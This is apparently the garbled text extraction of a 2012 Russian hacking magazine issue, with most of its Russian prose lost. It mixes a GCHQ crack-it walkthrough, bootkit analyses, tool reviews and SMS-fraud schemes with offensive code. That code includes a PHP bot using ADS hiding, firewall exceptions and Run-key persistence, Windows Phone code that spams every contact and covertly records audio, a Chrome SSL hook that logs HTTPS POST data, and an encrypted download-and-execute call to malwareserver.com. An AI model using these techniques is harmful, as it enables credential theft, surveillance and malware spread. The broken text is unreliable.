BAT To EXE Converter 1.5
, invisible
application include : bot., (php5ts.dll) (md5.exe).
, . , .
. , , attrib
'+h' '+s'. :
attrib "%CD%\bot.exe" +h +s
.
NTFS :
cd %systemroot%\system32
type packed_bot.exe>calc.exe:b0t.exe
:
brute|c4ca4238a0b923820dcc509a6f75849b:
c81e728d9d4c2f636f067f89cc14862c:eccbc87e4b5ce2fe28308f
d9f2a7baf3
FTP-,
, .
results.
, iamfinished.
cd "%systemroot%\system32
start .\calc.exe:b0t.exe
FTP.
Windows , :
passthru('netsh firewall add allowedprogram %WINDIR%\
system32\ftp.exe TCPInfrastructure>nul 2>&1 ');
exe ( , ,
%systemroot%):
passthru('reg add HKLM\software\microsoft\windows\
currentversion\run /v WinUpdate /t REG_SZ /d
%WINDIR%\packed_bot.exe /f>nul 2>&1');
03 /158/ 2012
PHP , .
,
, , ,
. z
065
plaintext (first@plaintext.su, http://www.plaintext.su)
I can
crack
it!

-,

][-,
. , ,

.
066
DVD

Can You
Crack It?.
03 /158/ 2012
I can crack it!
,

,

,
.
, (GCHQ)

Google, ,
, .
FIRST STEP
,
canyoucrackit.co.uk,
HEX- ( ) - Can
You Crack It?. HEX-,
, ,
ASCII,
.
HEX-
IDA Pro.
- . IDA
x86. ,
.
, .
256 ,
0 255,
,

RC4
8 0xDEADBEEF ( ).
, ,
.
, esp,
,
, ,
0xAAAAAAAA.
DWORD, 0xAAAAAAAA.
,
0xBBBBBBBB.
( ) .

, ,
.
iTXt PNG- ( UTF-8).
Base64
Comment ( ).
, ( )
,
:
GET /15b436de1f9107f3778aad525e5d0b20.js
HTTP/1.1
GET .
, . exe-,

,
( IDA)
:
__asm
{
int 3;
mov eax, array; array
call eax;
}
, jmp ( ) .
. , .

PNG- -
. PNG,
(
).
SECOND STEP

.
,
,
.
, (r0...
r3) ,

(cs ds ), -
UNIX CRYPT()
crypt *nix
,
.

DES (Data
Encryption Standard).
,
, , 7 .
7 56-
DES,
.

DES . .
,
25 .
, crypt ,
DES.
.

12 .

Base64.
keygen
03 /158/ 2012
067

(flg),
(ip).

, (
hlt, )
: mod 0 mod 1. ,

, ,
.

.

, cs ds . , ,
add r[5], 12, ,
,
(
So you did it
cs,
r5).
far jump ip.
, , ,

, ip
.
.

JavaScript, ,
,
. C.
,
, , :-).
(
hlt)
GET:
GET /da75370fe15c4148bd4ceec861fbdaa5.exe
HTTP/1.0
THIRD STEP
GET- , .
,
Cygwin. ,
,
keygen.exe,
.
. keygen URL
. :

licence.txt, ,
.
,
Stage one licence key Stage two licence key,

,
.
-

,
,
. .

,
,
,
,

.
,

,

,
068

- .
, ,

, ,
,
,

.

,
mov, movzx, add, xor, shl, shr
. ., (
).
,

,

.
,
.

(SBox'), ,
,
(
), ,
() . .
-.

,
.
,

(key schedule) /

.
(

key shedule
).
03 /158/ 2012
I can crack it!
,
, .

crypt ( Cygwin)
. ,

, ,
. IP
(URL ) DNS.
, URL :
canyoucrackme.co.uk. keygen.exe GET- :
GET-
:

key.txt,
So you did it
, ,
,
,
, ,
.
SUMMARY
GET /%s/%08X/%08X/%08X/key.txt HTTP/1.0
, - .

,
,
.
,
jump.

DWORD- firmware ( ).
,
,
7z, . , , ,
, .
RC4
GET /hqDTK7b8K2rvw/A3BFC2AF/D2AB1F05/
DA13F110/key.txt HTTP/1.0

,
-
.
,
. , GCHQ
, everyday heroes, ,

.
.
. z
RC4 ( ARC4)

.
,
RSA Security, 1987 . RC4 ,

.
8
,
0 255 (S)
: i j. RC4 :
(KSA)
. S
40 256 . KSA
:
for i from 0 to
S[i] := i
endfor
j := 0
for i from 0 to
j := (j + S[i]
mod 256
swap values of
endfor
255
255
+ key[i mod keylength])
S[i] and S[j]

.
:
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
K := S[(S[i] + S[j]) mod 256]
output K
endwhile
AES
03 /158/ 2012
RC4
SSL,
WEP, Adobe PDF
Microsoft Office. ,

. ,

PDF- RC4
40 ,
.
MS Office -
RC4

069
life4u
:
SMS
INFO

-.
,

.
30 !
-
?
,
SMS, ?
?
070
03 /158/ 2012
SMS: 30 !
? -

, .

, - ,

,
(,
1234).
SMS, -
, .
,
,
. SMS-
SMS-.

,
. SMS
( WebMoney .)
:
(,
) ,

-. SMS
. , , ,
, , -
?
, ,
,
. ,
? ,

.
,
, ,
(
, -!)
,

03 /158/ 2012
.
, ,
.
?

, , ,
.
,

.
(,
,
,
,
),
.

.
,
,
,

.
071

SMS-.
50%
, , , . ,

( , ).
SMS- ,
,
, .
(,
, . .), / (, ,
, -
. .).
.
,
SMS-,
web-
.
,
.

.
SMS-.
, , , . , , .
,

. SMS-
(, ,
),
. ,
.

, (,
).
- (,
) ,
, , , -
depositfiles
072
?

,
.
.
-

,
, - .
,
.
,
(,
),
IP-
,
.

,
.
, , ,
, , ,

,
!
, . SMS- ,
.

( ).
24 , ,
(
,
).
? ,

, , .
50
, ? , ,
( ,
, ).
, ,
,
.
. , -
,
- , ,
?. , ,
SMS,
,
,
.
,
? ? .
,
, .
,
,
?
?
, .
, 1. , ,
( ,
, , ). , .
? , :
,
.
, , , , .
, ,
! , :
.
, ,
, ,
!
,
, -
. ,
, ,
-, ,

03 /158/ 2012
SMS: 30 !

. ,
, !
(welcome back,
!). OK,
, .

.
2.

,
,
.

, ,
,
, ,
.
!
,
,
.
. ,
.
:
?
100 . ,
,
,
.
, ,
-
, ,
( ?)
.
, ,
,
.
, ,
.
.
! , ,
,
.
: http://
loh.ru/?pid=15991&subid=25483.
, . ,
, -
,
.
,
,
,
(
][),
.
. , ,
.
, , .
, ( ).
.
SEO-
. SEO-
, .

.
, , ,
, . .
. (
,
). , ! z

Jinconvert.ru .
: , ,
, ,

. , ! , ,
, 5 %
-.
03 /158/ 2012
Loadpays.ru ,
,
-.
.
,

.
Convert-plus.ru ( info-center.
cc) ,

,
. .
073
(icq 884888, http://snipper.ru)
X-Tools

:
NEOx.
URL:
bit.ly/xSLk8n.
:
Windows.
:
famatech.
URL:
radmin.ru/products/
ipscanner.
:
Windows.
:
Suicide[Vll].
URL:
r00t.in/showthread.
php?t=18056.
:
Windows.
PE TOOLS

ADVANCED IP SCANNER

DEATH-MOBILE
PE Tools PE/PE+ (64bit).

:
PE-, Task Viewer, Win32
PE-, /
. .
1. Task Viewer:
(Full, Partial,
Region);
.NET CLR-;
Anti Dump
Protection;
;
;
PE Editor PE Sniffer;
OEP.
2. PE Sniffer:
/;
;
.
3. PE Rebuilder:
PE-;
PE-.
4. PE Editor:
DOS-;
PE+ (64bit);
CRC;
/
.
- Radmin,

Advanced IP Scanner.
, .
:
1. .
, , , HTTP, HTTPS FTP,
.
2. Radmin. Radmin,
Radmin Server
. ,
,
Radmin Viewer.
3. .

.
4. Wake-On-LAN.
, Wake-On-LAN.

.
SMS,
. 75 120 . ,
, , , .

Mail.Ru. 100 300
.
,

. :
074
mymegaemail@mail.ru:passw
login@bk.ru:pass

, ,
. Death-Mobile

(, , ),
, ,
,
.

.
03 /158/ 2012
X-Tools
:
al-chemist.
URL:
al-chemist.ru/
dnfinder.html.
:
Windows.
:
Z.Razor (ZerveRTeam).
URL:
www.zerverteam.com.
:
Windows.
DOMAIN NAME FINDER,

Domain Name Finder. ,

. ?
,
!
SEO- .
:
, ;
:
Marcello Pietrelli &
Gianni Baini.
URL:
bit.ly/ukWQSX.
:
Windows.
;

;

;
;

(
) - viagra.
com, -
. ,
-
xakepviagra.com: [a-z]{5,5}viagra.com.
!
:
. .
URL:
z-oleg.com/secur/aps.
:
Windows.

WEB TOOL
FILES TERMINATOR

APS !
Web Tool ,
GET- POST-.
,
/// //- . .
(
Data UserAgent)
:

,
. Files Terminator.

,
, ,
.
, , . ,

,
,
.

:
1. .
2. , HMG IS5.
3. .
4. , P50739-95.
5. , DoD
5220.22-M(E).
6. , VSITR.
7. , RCPM TSSIT OPS-II.
8. .
9. .
APS (Anti Port Scanner) ,

. ( ),
.

. ,

(,
web-).
, .
APS
.
,
:
;

;

;
;
, IDS;
, .
#user# ,
#pass# ,
#md5(user)# md5,
#md5(pass)# md5,
#token1# #token(1-X)# ,
#count# .
, , .
(,
, X )
(
< ).
:
1. source-:
nick;pass .
2. : , .
3. :
.
03 /158/ 2012
075
MALWARE
, Senior malware researcher, ESET
2011

. , :
,
,
.
Load MBR
read mode
Load VBR
read mode
load malicious
MBR/VBR
Load bootmgr
read mode/protected mode
NT kernel
modifications
Load winload.exe
or winresume.exe
read mode/protected mode
load rootkit
driver
Load kernel and

boot start drivers
. 1.
076
. 2.
03 /158/ 2012
. 3. VBR
MBR Code
MBR Code
Partition Table Entry #1


MBR Data
MBR Data
Bootmgr Partition
Bootmgr Partition
OS Partition
OS Partition
Unpartitioned Space
Olmasco Partition
Before infecting
Empty Partition Entry
After infecting
Active Partition Entry
Existing Partition Entry
. 4. Olmasco

64- . 2010
64- Win64/Olmarik
(TDL4), Rovnix,
ZeroAccess (update), TDL4 (update), Carberp, Olmasco ( MaxSS). ,

03 /158/ 2012
. , . 1.

PoC-,
.
(MBR) ,
, -
077
MALWARE
. 5. Olmasco
. 6. Olmasco
,
.

. - - ,
.
Stuxnet,
Duqu ( Stuxnet). , ,
,

Stuxnet (, , :)).
Duqu .
, ,
0-day- CVE-2011-3402
,
;).
078
--! !
, Olmasco.
, VBR
(Volume Boot Record)
. VBR
, . 3.

,
MBR. , , .

, . .
,
(. 4).

.

03 /158/ 2012
,
.
. 5.

- . 6.
, IDA Hex-Rays
.

.
. 7.
, Olmasco, TDL4,
-, kdcom.dll.
WinDbg,

. :
(
),
kdcom.dll .
- - ,
Bochs
IDA Pro.
, Olmasco ,
TDL4
.
Load drv32 or drv64
mbr is loaded and executed
Call
KdDebuggerInitialize1
from loaded kdcom.dll
Load VBR of
malicious partition
substitute kdcom.dll with

dbg32 or dbg64
infected VBR is loaded and

executed
Load ntoskrnl.exe,
hal.dll, kdcom.dll,
bootvid.dll ant etc
Load \boot from

malicious file system
\boot is loaded and
executed
distrort /MININT option
Hook BIOS int 13h

handler load original
VBR
Load winload.exe
. 8. !
Substitute EmsEnabled
option with Winpe
VBRof originally active partition

is loaded and executed
Bootmgr is
loaded and
executed
Read bcd
. 7. Olmasco
03 /158/ 2012
--! !
Carberp, -.
Carberp ,
.
, .
- Win64/Rovnix,

. Carberp Rovnix -,
.
Carberp ,
.
Continue kernel
initialization
Loal MBR
Load kernel and

boot start drivers
. 9. Carberp
079
MALWARE
. 10. , - Carberp

(. 9).
, .
, . ,
. (
), ,

, .
:
MS10-073 (win32k.sys KeyboardLayout vuln);

MS10-092 (Task Scheduler vuln);

080
. 11. Carberp
MS11-011 (win32k.sys SystemDefaultEUDCFont vuln);

NET Runtime Optimization vuln (http://osvdb.org/show/osvdb/71013).
, , . 10.

-
(. 11).
, .
-
.
user-mode-.

, NtQueueApcThread()/NtResumeThread().
Carberp : -, , dll-,
. , , .
. ,
GMER RKU.
Carberp ,
03 /158/ 2012
success
Check if
already
infected
Loal MBR
fail
Real mode
Check OS
Version
Win 2000
Load VBR
Real mode
Win XP
Vista/Win7
success
Target of Win64\Rovnix
Check Admin
Privileges
fail
Determine OS
Digit Capacity
Load bootstrap code

real mode / protected mod
Load bootmgr
Install Corresponding
Kernel mode Driver
Call ShellExecuteEx
API with runas
Load winload.exe or
winresume.exe
Overwrite Bootstrap
Code of Active Partition
Initiate System Reboot
. 12. Rovnix
,
x86-, x64-. 2012 , ,
.
!
- Rovnix,
, MBR.
. 12.
-, , Bootstrap-, .
Bootstrap ,
VBR (Volume Boot Record), bootmgr.
. Rovnix, Olmasco,
-, ,
Olmasco, ,
, , , , - .
,
,
.
03 /158/ 2012
Load kernel and boot

start drivers
Self Delete and Exit
. 13. Rovnix
, Rovnix , , MBR. , ,
, . ,
.
, SecureBoot Win8,
.
-
,
- .
,
. ,
,
-, ,
,
, . , , , . z
081
MALWARE
yurembo (yazevsoft@gmail.com)

- ,
, . ,
, MS WM6.5,
,
. !
082
INFO

MediaElement
(

mediaSound),
XAML-

: <MediaElement Height="120"
Name="mediaSound"
Width="160" />.
WWW
windowsphonehacker.com
,

WP
77.5.
CD

,

.
03 /158/ 2012
WP , Windows Phone 7.5

, , - (goo.gl/YbIru),
. , (, Facebook).
, ,
!
, ,
.
,
, -
,
. :
- , ,
.
WP 7
-. ( 2012-), ,
, . Microsoft
,
, .

WINDOWS PHONE

, , . :)
, WP 7,
Windows
Phone Marketplace 99 . ChevronTeam ChevronWP7,
.
, .
WP 7, Mango MS WP 7.5,
, ChevronTeam . ,
. , ,
, . , ! :)

. ,
.
, ,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB,
ZuneDriver, Device
Parameter : ShowInShell , PortableDeviceNameSpaceExcludeFromShell ,

EnableLegacySupport .
WP 7
. , , WP 7.5
. , ,
,
(-).

.
, WP (
MS ;)), , -,
, .
WP .NET Silverlight.
,
API. SMS
.
!
, :
using System.Windows.Navigation;
, Microsoft.Phone.
Tasks, SMS (. ). , :
protected override void OnNavigatedTo(NavigationEventArgs e)
{
SmsComposeTask msgSMS = new SmsComposeTask();
msgSMS.Body = " -";
WINDOWS PHONE
, Microsoft .
1. (
.NET Compact), , ()
.
2.
(chamber).
3.
,
, ,
.
03 /158/ 2012
4. . ( ,
, ,
,
?
.)
5.
Windows Phone Marketplace.
6. SSL. ,
, .
7.
ProtectedData ( -
System.Security.Cryptography),
.
8. WP 7 : AES, HMACSHA1,
HMACSHA256, Rfc2898DeriveBytes, RSA,
SHA1, SHA256.
9. , IE,
.
10. , Microsoft,

.
083
MALWARE
msgSMS.To = "1928";
msgSMS.Show();
}
;
.
:)
, ,
:).
, WP 7.5
.
, ,
, . ,
.
. WP- (
, 7.5, SDK
7.1) Silverlight, C#-
Microsoft.Phone.UserData,
.

. , ,
Contacts,
. MainPage InitSearch,
contacts.SearchAsync(String.Empty, FilterKind.DisplayName, null)
.
SearchAsync : (
, ); , ( , ,
None, , ); ,
, null. -

Windows Phone
:
1.

( hash-: = ).
2. .
3. ,

LINQ, / .
,
,
.
ContactsSearchEventArgs.,
SearchCompleted,
MainPage:
contacts.SearchCompleted += new EventHandler<
ContactsSearchEventArgs>(contacts_SearchCompleted)
:
void contacts_SearchCompleted(object sender,
ContactsSearchEventArgs e)
{
int max = e.Results.Count(); //-
string adr;
try { //
for (int i = 0; i < max; i++)
if (e.Results.ElementAt(i).EmailAddresses != null)
{
adr = e.Results.ElementAt(i).
EmailAddresses.First().EmailAddress; //
if (adr != null && adr != "") //
SendEmail(adr); // :)
}
}
catch (Exception ex) { }
}
,
, e-mail- ( ) , ,
SendEmail, .
:
void SendEmail(String adr)
{
EmailComposeTask email = new EmailComposeTask();
email.To = adr;
email.Subject = "Holy mail";
email.Body = "Download my prog";
email.Show();
}
,
( EmailSender).
Overhear2
084
03 /158/ 2012
,
- .
, .
, . ,
! ;)

, , , ,
.
,
(Overhear2, ),
, .
,
Silverlight- WP. C#-
:
using
using
using
using
using
System.IO;
Microsoft.Xna.Framework;
Microsoft.Xna.Framework.Audio;
System.Windows.Threading;
System.IO.IsolatedStorage;
, FrameworkDispatcher ( , ), , , ,
(
, ),
. MainPage (.
). ,
. ,
Windows Phone
, :).
, .
, . (
) .
,
, . recordingStopped ,
, , ,
( ), .

DispatcherTimer .
xna.
xna, :
DispatcherTimer dt = new DispatcherTimer();
dt.Interval = TimeSpan.FromMilliseconds(33);
, ,
: dt.Tick += new EventHandler(dt_Tick).
dt.Start() .
, ,
. ,

(, 10 000 ),
, .
,
SetupMicrophone. ,
. - ,
, , .
,
.
. , . WriteWavHeader ,
. , microphone.Start()
.
.
,
33 . ,
. , ,
recordingStopped .
,
.
( 500 ) microphone_BufferReady.
. recordingStopped , , ,
.
, : , ?
, ,
, .
, , ,
.
SaveFile() (. ), ,
.
private void SaveFile() { //

, ,
()

.
,
.

03 /158/ 2012
,
(dormant), ,

.
(active -> dormant)
tombstoning.
, (terminate)
. ,

:
Launching , Closing
, Deactivating (
) Activating
tombstone. ,

, .
085
MALWARE
using (IsolatedStorageFile isoStorage =
IsolatedStorageFile.GetUserStoreForApplication()){
using (IsolatedStorageFileStream isoStream =
isoStorage.CreateFile(FileName)) {
isoStream.Write(stream.ToArray(), 0,
stream.ToArray().Length);
}
}
}
, ,
.
,
. , wav-.
, :). wav-,
. (goo.gl/ufe3y)
, (
). !
WriteWavHeader,
, ( SetupMicrophone), UpdateWavHeader,
,
, , (
microphone_BufferReady, ,
SaveFile).
wav-. ,
microphone_BufferReady (
recordingStopped), PlayFile
.
:
private void PlayFile() { //
using (var isf =
IsolatedStorageFile.GetUserStoreForApplication()) {
if (isf.FileExists(FileName)) {
using (var isoStream = isf.OpenFile(FileName,
FileMode.Open, FileAccess.Read)) {
mediaSound.Stop();
mediaSound.SetSource(isoStream);
mediaSound.Position=System.TimeSpan.FromSeconds(0);
mediaSound.Volume = 20;
mediaSound.Play();
}
}
}
}
Overhear
,
.
mediaSound.
,
, .
,
.
: , , ( )
( ). Play :
sound = new SoundEffect(stream.ToArray(),
microphone.SampleRate, AudioChannels.Mono);
sound.Play();
! , : , Windows Phone
, . !
Windows Phone 7.5,

.
WP ,
. ,
Marketplace Hub ( ),
. ,
, , ! z

WP 7 .
, ,
. :
1. The Trusted Computing Base (TCB)
.

, - , .

086
, ,
,

Windows Phone Marketplace,

.
2. The Elevated Rights Chamber (ERC) .
,
, ,
.

.
3. The Standard Rights Chamber (SRC)
, MS Office
Mobile, Internet Explorer 9 . .
4. The Least Privileged Chamber (LPC) ,
Microsoft.
, .
03 /158/ 2012
Preview
088
GOOGLE CHROME
,

.
Internet Explorer Mozilla Firefox

.
Google Chrome
, , . -,
,
,

.
094

,

. Python!
UNIXOID
108

Fedora

.
?
SYN\ACK
114

DLP-. - .
03 /158/ 2012
110

Linux-,

.
FERRUM
124

Django-
? .
130
!

. ,
.
087
(seserega@gmail.ru, blotlore.blogspot.com)
Google Chrome

GOOGLE
WWW
goo.gl/Cj4Pl
OllyDbg

.
goo.gl/rdAfo
,
IDA.
goo.gl/uIqMb

,

Chrome.
goo.gl/sZWwZ
.
INFO

__declspec(naked),

.

,

. Internet
Explorer Mozilla Firefox
.
Google Chrome ,
.
088
03 /158/ 2012
Google Chrome
. 1. OllyDbg
, ,

. IE , HttpSendRequest,
wininet.dll, Firefox PR_Write nspr4.dll, ,
.
. 2. SSL-
SRV*c:\code\symbols*http://msdl.microsoft.com/download/
symbols;SRV*c:\code\symbols*http://chromium-browsersymsrv.commondatastorage.googleapis.com
Google Chrome , WSASend. , .

,
SSL- .
OllyDbg
, Google

(goo.gl/8SgW2, Chrome ).
,
, ++.
, , ssl socket.

ssl_socket.h (goo.gl/6cw0w), ,
. , ssl
socket, ssl_client_socket_nss.cc, ssl_
client_socket_openssl.cc ssl_client_socket_win.cc. ,
Firefox PR_Write,
.
ssl_client_socket_nss.cc.
, , .
,
SSLClientSocketWin::Write, - PR_Write. , , :
SSLClientSocketOpenSSL::Write SSLClientSocketWin::Write. .
. Google
Chrome, goo.gl/fwt1S.
, :
1. WinDBG.
2. File Symbol File Path.
3. :
03 /158/ 2012
4.
5.
6.
7.
c:\code\symbols ,
.
View.
Command, Registers Disassembly.
Chrome.
File Attach to a Process...
chrome.exe .
x chrome*!* SSLClientSocketNSS::Write
( Command)
SSLClientSocketNSS::Write, SSLClientSocketWin::Write. (breakpoints) Gmail-.
SSLClientSocketNSS
::Write.
,
int SSLClientSocketNSS::Write(
IOBuffer* buf,
int buf_len,
const CompletionCallback& callback
)
,
POST-. ,
IOBuffer:
class NET_EXPORT IOBuffer :
public base::RefCountedThreadSafe<IOBuffer>
{
public:
IOBuffer();
explicit IOBuffer(int buffer_size);
char* data() { return data_; }
protected:
friend class base::RefCountedThreadSafe<IOBuffer>;
explicit IOBuffer(char* data);
virtual ~IOBuffer();
char* data_;
};
, -
089
. 3. SSL-
,
. OllyDbg
SSLClientSocketNSS::Write (. 1),
DWORD (. 2).
, DWORD ( IOBuffer+8) (char*),
HTTPS- (. 3).
, POST , . ,
SSLClientSocketNSS::Write (. 4).
POST , .
.

,
, .
, ,
, , GetProcAddress
.
PE-, , chrome.exe
chrome.dll. ,
SSLClientSocketNSS::Write dll.
, .
090
- .

. (
, )
14 , chrome.dll .

chrome_1c30000!net::SSLClientSocketNSS::Write:
02875a4c 55
push
ebp
02875a4d 8bec
mov
ebp,esp
02875a4f 51
push
ecx
02875a50 53
push
ebx
02875a51 56
push
esi
02875a52 57
push
edi
02875a53 ff7508
push
dword ptr [ebp+8]
02875a56 8bf1
mov
esi,ecx
02875a58 33db
xor
ebx,ebx

(BYTE*),
, . ,
. ?, x.
03 /158/ 2012
Google Chrome
if(DataCompare((BYTE*)(dwAddress+ i),pbMask,szMask))
return (DWORD)( dwAddress + i );
}
return 0;
}
- , is f*cking unstable.
, , .
. 4. SSLClientSocketNSS::Write
:
char* Sign = "\x55\x8B\xEC\x51\x53\x56\x57\xFF\x75\x08
\x8B\xF1\x33\xDB"; // SSLClientSocketNSS::Write
char* Mask="xxxxxxxxxxxxxx"; //
DWORD SSLAdr = FindPattern(ChromeDLL,
Chrome32Size,
(BYTE*)Sign,
Mask); // SSLAdr - SSLClientSocketNSS::Write
:
bool DataCompare( const BYTE* pData,
const BYTE* bMask, const char* szMask )
{
for( ; *szMask; ++szMask, ++pData, ++bMask )
{
if( *szMask == 'x' && *pData != *bMask )
return false;
}
return ( *szMask ) == NULL;
}
DWORD FindPattern ( DWORD dwAddress,
DWORD dwSize, BYTE* pbMask, char* szMask )
{
for( DWORD i = NULL; i < dwSize; i++ )
{
K, , .
. , , ,
. , , 5 JMP _.
5 ,
JMP. . ,

, , .
. ,
JMP , .
.
.

PAGE_EXECUTE ( VirtualProtect),
5 ( )
. 5 ,
asm- ,
. ,
, -
.
, JMP, [ +
]. ,
JMP _.
,
,
( ).
-, ,
:

. ,
openws akademiker
PR_Write ( - ),
Chrome
Zeus ( , ).
PR_Write
//
char* Sign = "\x8b\x4c\x24\x04\x57\xe8\x00\x00\x00\x00\x8b
\xf8\x85\xff\x75\x05\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xb7
\x38\x02\x00\x00";
//
char* Mask="xxxxxx????xxxxxxxxxxxxxxxxxxx";
03 /158/ 2012
, PR_Write
, combined_
methods, ,
WinDBG SSLClientSocketNSS::DoPayload
Write (. 5).
,
. ,
combined_methods PR_Write
OCh . SpyEye
, .
TranslateMessage, ,
, ZwReadFile,
(
goo.gl/xTX9j). , .
091
. 5. Combined_methods SSLClientSocketNSS::DoPayloadWrite
__declspec (naked) int Hooked_SSLWrite(

DWORD buf,
int buf_len,
void* callback)
{
static bool IsPostData;
WriteLog(LogFile,*(char**)(buf+8));
IsPostData=true;
}
else if ((strncmp((LPCSTR)*(char**)(buf+8),
"GET", lstrlen("GET"))==0)|| IsPostData)
{
WriteLog(LogFile,*(char**)(buf+8));
IsPostData=false;
}
__asm
{
push ebp;
mov ebp,esp;
push ebx;
push esi;
push edi;
push ecx;//argument
}
//
//
ChromeHook.UnsetSplicing();
TrueSSLWrite = (SSLWrite)ChromeHook.GetHookedFunc();
//
__asm
{
pop ecx;//argument
mov eax,callback;
push eax;
mov eax,buf_len;
push eax;
mov eax,buf;
push eax;
call TrueSSLWrite;
push eax;
}
//
ChromeHook.ReSplice();
if((strncmp((LPCSTR)*(char**)(buf+8),
"POST",lstrlen("POST"))==0))
{
092
__asm
{
pop eax;
pop edi;
pop esi;
pop ebx;
leave;
ret 0Ch;
}
}
__declspec(naked) , ,
ex. , ,
, .

thiscall,
(
Write SSLClientSocketNSS). ecx
,
.
-
( DLL-) !
Google Chrome , ,
.
. , ,
. . z
03 /158/ 2012
>> coding
Peter and the Wolf (peterandthewolf@real.xakep.ru)
/++

( )
,
.
, ,
, .

.
WWW
Cog
:
nedbatchelder.com/
code/cog.
INFO
094
,

python-

cog.

.
,
.
? , , ? , ():
URLDownloadToFile(NULL, "http://malwareserver.com/test.exe",
"C:\\test.exe", 0, NULL);
,
URLDownloadToFile,
.rdata .data . hex- . , ,
, - :
URLDownloadToFile(
NULL,
Decrypt("\x0E\x12\x12\x16\x5C ..."),
Decrypt("\x25\x5C\x3A\x12\x03 ..."),
0,
NULL);
,
. - , ,
, .
,
, . (
), - .
PYTHON
, , , -
Cog (http://pypi.python.org/pypi/cogapp).
,

. , , Cog
,
,
. , Cog :
// ++
...
/*[[[cog
03 /158/ 2012
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
//[[[end]]]
...
:
// ++
...
/*[[[cog
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
void DoSomething();
void DoAnotherThing();
void DoLastThing();
//[[[end]]]
...
python.exe cog.py -r test.cpp, test.

cpp , !
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
Decrypt("\0x0E\0x12\0x12\0x16\0x5C ...")
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
Decrypt("\0x25\0x5C\0x3A\0x12\0x03 ...")
/*[[[end]]]*/,
0,
NULL);
, Visual
Studio , . ,
Encrypt cog-, .
BIN2H
[[[cog ]]] ,
,
]]] [[[end]]]. Cog ,
,
.
, , ,
. ,
.

out outl ( out, ) cog.
,
python-. ,
.

. Cog
xor:
/*[[[cog
import cog
key = 0x66
def Encrypt(str):
cog.out('Decrypt("')
cog.out("".join(['\\' + ("0x%02X" % (ord(char)^key))
for char in str]))
cog.out('")')
]]]
[[[end]]]*/

URLDownloadToFile Encrypt:
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
/*[[[end]]]*/,
0,
NULL);
03 /158/ 2012
, . , Cog

bin2h . bin2h
, , :
def bin2h(filename, valuename):
data = open(filename, 'rb').read()
cog.outl('BYTE %s[] = {' % valuename)
for byte in data:
cog.out('0x%02X, ' % ord(byte))
cog.outl('}')
cog.outl('DWORD %s_size = %d;' % (valuename, len(data)))
, (
PE-), :
//[[[cog bin2h("test.bin", "test")]]]
/*[[[end]]]*/
:
//[[[cog bin2h("test.bin", "test")]]]
BYTE test[] = {
0x23, 0x69, 0x6E, 0x63, 0x6C ...
//
}
DWORD test_size = 7079;
/*[[[end]]]*/,
bin2h
.

, ,
.
, , API . c CorePy
, -
. z
095
,

.
, .

-.
40
...
096
, .
- . :
, .
, .
?
... !
... ? .
?
, ,
-- .
!
, .
, . ... ( )
!
?
03 /158/ 2012
, ,
, , --
. : . :) .
13:
, .
, ,
. , , ,
, , .
.
. ,
?
1
1
1
1
1
1
2
2
2
2
3
3
3
4
*
*
*
*
*
*
*
*
*
*
*
*
*
*
1
2
3
4
5
6
2
3
4
5
3
4
5
4
*
*
*
*
*
*
*
*
*
*
*
*
*
*
11 = 11
10 = 20
9 = 27
8 = 32
7 = 35
6 = 36
9 = 36
8 = 48
7 = 56
6 = 60
7 = 63
6 = 72
5 = 75
5 = 80
, . ,
: 1*6*6 2*2*9. ,
, 36,
, ,
. ,
, , ,
. : ,
.
, .
, , .
(1-6-6 2-2-9) .
, , .
( ). :
,
Python.
Oracle.
cx_Oracle,

Oracle.
, ,
:
, ;
, ;
,
.

, , .
, :
,
;
,
.
,
, . ,
:
1.

2.
, ,
, .
Oracle
. , , .
.
test1 test2,
( )
- :
CREATE TABLE test1(prod VARCHAR(10), price INT);
CREATE TABLE test2(prod VARCHAR(10), price INT);
import cx_Oracle
#
conn = cx_Oracle.connect('system/qwerty@XE')
cur = conn.cursor()
#

for line in open('file.txt'):
cur.execute("INSERT INTO test VALUES (:s)", s=line)
# ,
cur.execute('COMMIT')
cur.close()
,

, .

.
03 /158/ 2012
JOIN,
.
LEFT JOIN ,
(), ,
().
. ,
.
WHERE test3.prod IS NULL, , , .
:
SELECT test1.* FROM test1 LEFT JOIN test3
ON test1.prod=test2.prod AND test1.price=test2.price
WHERE test2.prod IS NULL;
,
JOIN, , ,
, -
097

1. ,
,
, None,
.
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}
. .
,
. ,
, ,
. .
, - .
:
. ,
.
, .
2. :
def myappend(a = [], num = 0):
a.append(num)
print a
,
:
>>>
>>>
>>>
>>>
>>>
>>>
>>>
a = [1,2,3]
myappend(a)
myappend()
myappend()
a = {1:2, 3:4}
myappend(*a)
myappend(**a)
3. , .
>>> a =
>>> b =
>>> for
<Keeper
Keeper()
Keeper()
i in Keeper.list_instances(): print i
instance at 0x...
4. ?
389/tcp
open
ldap
, .
, *nix,
, chkrootkit.
, , . Chkrootkit
,
.
rkhunter unhide.
, .
http://goo.gl/9HXEt.
GMER RootRepeal.
, , - ,
.

(IDS intrusion detection system).
. ,
.
Snort
Suricata. , , .
- -
(WAF web application firewall),
.
(Anonymous bind OK)
,
.
,
. , .
.
, . ?
, ,
, .
( ,
. .), .
, ,
,
, .

, : l = 2 * pi * R,
R . ,
. R,
l/2, pi * R.
, , ,
3,14 , , , ,
. , .
, , - ! ,
: , ?
,
: , .
:
3 + 5 = 8
5 + 7 = 12
7 + 11 = 18
...
, ,
,
, .
,
098
03 /158/ 2012
, , .
, . ,
,
( , r < 3/pi * R/4) ,
. ,
. ,
R/4 , . , ,
l/2, 12,56 (2 * 3,14 * 4/2). ,
, ,
, !
r < 3/pi * R/4 , ,
.
!
P. S. :
1. ?
2.
?
c , URL (
URL), N . N, , 10.
.
threading,
eventlet, gevent, Twisted .
# URL
